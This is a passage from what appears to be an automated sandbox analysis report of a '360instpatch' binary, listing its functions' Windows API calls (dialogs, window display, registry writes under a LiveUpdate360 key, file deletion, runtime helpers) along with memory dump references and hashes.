                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$DirectoryExistsFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1302732169-0
                                                                                                                                                                                                              • Opcode ID: 09b41a08c8545e0ab651c89f872e0dc66698475bafdb43a7667eeedfc6aab193
                                                                                                                                                                                                              • Instruction ID: cea22c1254d0150e5ba21418027440c809527a4bb212f8fa16c53320d2c27611
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b41a08c8545e0ab651c89f872e0dc66698475bafdb43a7667eeedfc6aab193
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E01A36312251FB97219B665C08B6B36B8AF86B54B12441DF580EA664D714C802C6A5
                                                                                                                                                                                                              Function 00B2AA43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000E), ref: 00B2AA58
                                                                                                                                                                                                              • CreateDialogParamW.USER32(00000081,?,Function_0001A96B,?), ref: 00B2AA89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDialogErrorLastParam
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445605341-0
                                                                                                                                                                                                              • Opcode ID: 64fe0d119874183ff03a2939cf568167180d45485d69c13834691cdded12670e
                                                                                                                                                                                                              • Instruction ID: 763641d520d88ab3a8e963386360596b90b1ca1b291e2419dd9b78994db7be2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fe0d119874183ff03a2939cf568167180d45485d69c13834691cdded12670e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AE04832594320BBD711AB20ED06FEA7FD8BF19F01F014865B55DA60E0EFA19C54C766
                                                                                                                                                                                                              Function 6BF26F3F Relevance: 3.0, APIs: 2, Instructions: 21registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF26DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,6BFCC288,00000000,6BF8AC78,74DF30D0,?,6BFCC3F0,6BFCC288), ref: 6BF26DF2
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(00000000,6BF0EB14,00000000,00000004,00000000,00000004,6BF8AC78,6BF0EB14,LastUploadDate,00000000,?,6BFCC3F0,6BFCC288), ref: 6BF26F5F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,6BFCC3F0,6BFCC288), ref: 6BF26F66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 779948276-0
                                                                                                                                                                                                              • Opcode ID: bfd60810f9adfbb9bf81968cae532d2fbde936fd5b3c513b46da18261469f2c9
                                                                                                                                                                                                              • Instruction ID: f3b9400530226fd478c0d153807f7377865001c5c868128f1c7e3cc150dec961
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfd60810f9adfbb9bf81968cae532d2fbde936fd5b3c513b46da18261469f2c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10D05E33446B3177DA92AAA8AC05FCF3B986F56720F050480FB409A1A4C724D98F57EA
                                                                                                                                                                                                              Function 00B467E9 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005,00BFBC8C,00B2AFA3,?), ref: 00B467FA
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,00BFBC8C,00B2AFA3,?), ref: 00B46809
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1268545403-0
                                                                                                                                                                                                              • Opcode ID: f2a1a8429180fe5963e47266fe7edcf430fe6ccedd9777365a520c27b218dbce
                                                                                                                                                                                                              • Instruction ID: 6567f3a62ae9a599c9d12f50b0bd7edb446c1d1c8fd7fcf11781f1ddc3ce0cab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2a1a8429180fe5963e47266fe7edcf430fe6ccedd9777365a520c27b218dbce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3E01A31145600FAE2219B20CC0AFD9B7E1FB25706F51886EB1D1620A0D7B56940DA46
                                                                                                                                                                                                              Function 6BEECEFD Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,6BF0CFA0), ref: 6BEECF0F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,6BF0CFA0), ref: 6BEECF27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2633145722-0
                                                                                                                                                                                                              • Opcode ID: db8d3bdb1ca809e3aace396949b2585773a9970eb1cee66b903845f2c4a3c3e4
                                                                                                                                                                                                              • Instruction ID: 0e00105572a2f619bf2451ca1c0883ff9310888e973abd1f841798cd2669281d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db8d3bdb1ca809e3aace396949b2585773a9970eb1cee66b903845f2c4a3c3e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45E08633600501DBC6145A28D804A86BBB5BB923317354749E0B8D33E0D734E45BC6B0
                                                                                                                                                                                                              Function 6BEED392 Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,6BF0CF98), ref: 6BEED3A4
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,?,6BF0CF98), ref: 6BEED3BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2633145722-0
                                                                                                                                                                                                              • Opcode ID: 937e93ae96adbf9fa97c7a05ea6d897d984c448dbaae1c97365c16360b7f1428
                                                                                                                                                                                                              • Instruction ID: 22a2a7f8ec8a7c9a962556a0e22b6f96dbf7ac0dda79f96a8e887da6cc64dd24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 937e93ae96adbf9fa97c7a05ea6d897d984c448dbaae1c97365c16360b7f1428
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE08C37100541DBC6145A28D8489C9B7B5BBC3336775879AE0B5D32A0EB34A8AB8AB0
                                                                                                                                                                                                              Function 6BF3ABB0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6BF3ABBC
                                                                                                                                                                                                                • Part of subcall function 6BF3F185: __getptd_noexit.LIBCMT ref: 6BF3F188
                                                                                                                                                                                                                • Part of subcall function 6BF3F185: __amsg_exit.LIBCMT ref: 6BF3F195
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __IsNonwritableInCurrentImage.LIBCMT ref: 6BF3AB86
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __getptd_noexit.LIBCMT ref: 6BF3AB96
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: __freeptd.LIBCMT ref: 6BF3ABA0
                                                                                                                                                                                                                • Part of subcall function 6BF3AB73: ExitThread.KERNEL32 ref: 6BF3ABA9
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 6BF3ABDD
                                                                                                                                                                                                                • Part of subcall function 6BF42CFD: __getptd_noexit.LIBCMT ref: 6BF42D05
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                                                                              • Opcode ID: 8ad10e1ac54e233bd4b421ae6b86792132a121253e87e9c1ce07abfc65ca4883
                                                                                                                                                                                                              • Instruction ID: 88f92c02908d17cdeb758f2f279ee13b26c7eed8c9a475f98c84992a9919e0b6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ad10e1ac54e233bd4b421ae6b86792132a121253e87e9c1ce07abfc65ca4883
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E0ECB2914606AFEB18ABB0D906E2E7776EF44215F210099E1019B2B1CB7E99409A60
                                                                                                                                                                                                              Function 00B9E9C8 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B9E9D4
                                                                                                                                                                                                                • Part of subcall function 00BA4E30: __getptd_noexit.LIBCMT ref: 00BA4E33
                                                                                                                                                                                                                • Part of subcall function 00BA4E30: __amsg_exit.LIBCMT ref: 00BA4E40
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __IsNonwritableInCurrentImage.LIBCMT ref: 00B9E99E
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __getptd_noexit.LIBCMT ref: 00B9E9AE
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: __freeptd.LIBCMT ref: 00B9E9B8
                                                                                                                                                                                                                • Part of subcall function 00B9E98B: ExitThread.KERNEL32 ref: 00B9E9C1
                                                                                                                                                                                                              • __XcptFilter.LIBCMT ref: 00B9E9F5
                                                                                                                                                                                                                • Part of subcall function 00BAAE94: __getptd_noexit.LIBCMT ref: 00BAAE9C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 393088965-0
                                                                                                                                                                                                              • Opcode ID: 7a521fa8bef36cf283348dcba20538d301a204da11a3957ed52103e895abbc94
                                                                                                                                                                                                              • Instruction ID: 19ffce6d812b0a755dab0260076d00bca1ecdb30e973297d547c4816169fecb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a521fa8bef36cf283348dcba20538d301a204da11a3957ed52103e895abbc94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE0ECB5914604AFDB08EBA0C856E2E77A5AF45311F2004D8F1026B2B2CB79AD41DA21
                                                                                                                                                                                                              Function 00B4662B Relevance: 3.0, APIs: 2, Instructions: 15timewindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KillTimer.USER32(?,00002711), ref: 00B4663D
                                                                                                                                                                                                              • PostMessageW.USER32(?,000009DD,00000000,00000000), ref: 00B4664F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: KillMessagePostTimer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3249405171-0
                                                                                                                                                                                                              • Opcode ID: 4f9ea4417dabc37a6e8023b1a07e96f615d937c2d169558600ade927dc59049b
                                                                                                                                                                                                              • Instruction ID: 3c141c2354616956148225f23c4db85d2924c981420fa770a687c6811e800aad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f9ea4417dabc37a6e8023b1a07e96f615d937c2d169558600ade927dc59049b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD0A931150610FFE7200B24ED0EF827BA8EB28B01F10843BF219B50A0EBB0EC60CA44
                                                                                                                                                                                                              Function 00B46659 Relevance: 3.0, APIs: 2, Instructions: 14windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00B4665F
                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002), ref: 00B46672
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IconNotifyShell_VisibleWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1820326197-0
                                                                                                                                                                                                              • Opcode ID: 36f2f8f0509ce27ff978817e00180ae7ca89e77841733aae9db336fb1f28786c
                                                                                                                                                                                                              • Instruction ID: 04e1be664db075090e26486b4ebf01e647948f608b3242944fd99c84d70b3be4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36f2f8f0509ce27ff978817e00180ae7ca89e77841733aae9db336fb1f28786c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35D01232951131ABE7141B209D0DFA76AACDF1E751F07483968AAD61A0EEA0CC00D5E0
                                                                                                                                                                                                              Function 6BF1163F Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 6BF117FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4201588131-0
                                                                                                                                                                                                              • Opcode ID: b3cc7788714a12d7dc475919dd0c8dc01a25976935e129bfddb4c46a8e5efdd6
                                                                                                                                                                                                              • Instruction ID: 867bb3c30467235cf0b07a70a5016d623fd4898571c959e510d16a81e303f612
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3cc7788714a12d7dc475919dd0c8dc01a25976935e129bfddb4c46a8e5efdd6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18516033504616EFCB11AFB4C9A185EBBF5BF29704B008D29E64652670DB3DEA11EB50
                                                                                                                                                                                                              Function 6BEE9B92 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BEE9C5C
                                                                                                                                                                                                                • Part of subcall function 6BEE789C: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 6BEE78B6
                                                                                                                                                                                                                • Part of subcall function 6BEE789C: GetLastError.KERNEL32 ref: 6BEE78C7
                                                                                                                                                                                                                • Part of subcall function 6BEE789C: GetLastError.KERNEL32 ref: 6BEE78CD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1834257132-0
                                                                                                                                                                                                              • Opcode ID: cebb2e84764aa1706b7be0193a6adcdc65585f6f24eb895a9b58ad8a694f9d42
                                                                                                                                                                                                              • Instruction ID: dd5ed5abaade632fb5b23e57e3ee23ab01b5fc4162acb588f4fd7506b4441716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cebb2e84764aa1706b7be0193a6adcdc65585f6f24eb895a9b58ad8a694f9d42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7417376600119AFCF15DF74DC91EEE37ADAF45308F100169E8066B1A2DB7CAA56CBA0
                                                                                                                                                                                                              Function 00B844E3 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B844EA
                                                                                                                                                                                                                • Part of subcall function 00B842DE: __EH_prolog3.LIBCMT ref: 00B842FD
                                                                                                                                                                                                                • Part of subcall function 00B842DE: GetDriveTypeW.KERNEL32(?,0000000C), ref: 00B84327
                                                                                                                                                                                                                • Part of subcall function 00B82158: __EH_prolog3.LIBCMT ref: 00B82177
